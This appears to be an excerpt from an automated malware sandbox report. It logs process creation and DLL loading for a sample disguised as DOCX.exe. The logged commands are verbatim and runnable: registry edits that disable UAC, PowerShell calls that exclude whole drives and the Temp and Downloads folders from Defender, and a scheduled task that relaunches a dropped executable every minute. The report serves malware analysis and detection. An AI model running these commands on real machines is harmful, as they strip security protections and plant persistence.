Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM tor.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM CMD.exe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1952,i,12353421626427265679,11746865726713041446,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Process created: C:\Users\user\Desktop\._cache_DOCX.exe "C:\Users\user\Desktop\._cache_DOCX.exe"
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn TGWEKK.exe /tr C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe /sc minute /mo 1
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\TGWEKK.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn TGWEKK.exe /tr C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe /sc minute /mo 1

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
